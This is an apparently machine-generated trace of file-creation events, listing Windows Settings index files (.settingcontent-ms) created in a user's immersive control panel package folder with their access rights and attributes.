Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupLockScreenPreview.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupMapsUpdates.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupNotificationsAppList.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupOneSyncAccounts.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemDetails.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPen.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupSpeechMicrophone.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupVirtualDesktops.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupYourAccount.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsManage.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsPicture.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsSync.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsUsers.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageActivate.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsDefaults.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsNotifications.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageBackground.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageBatterySaver.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageColors.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageDataSenseOverview.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageDevicesPen.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageDevicesPrinters.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageLockScreen.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageMaps.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageMultiTasking.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkDialup.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkDirectAccess.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkEthernet.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkProxy.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkVPN.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkWiFi.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkWorkplace.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemBluetooth.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemDevices.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
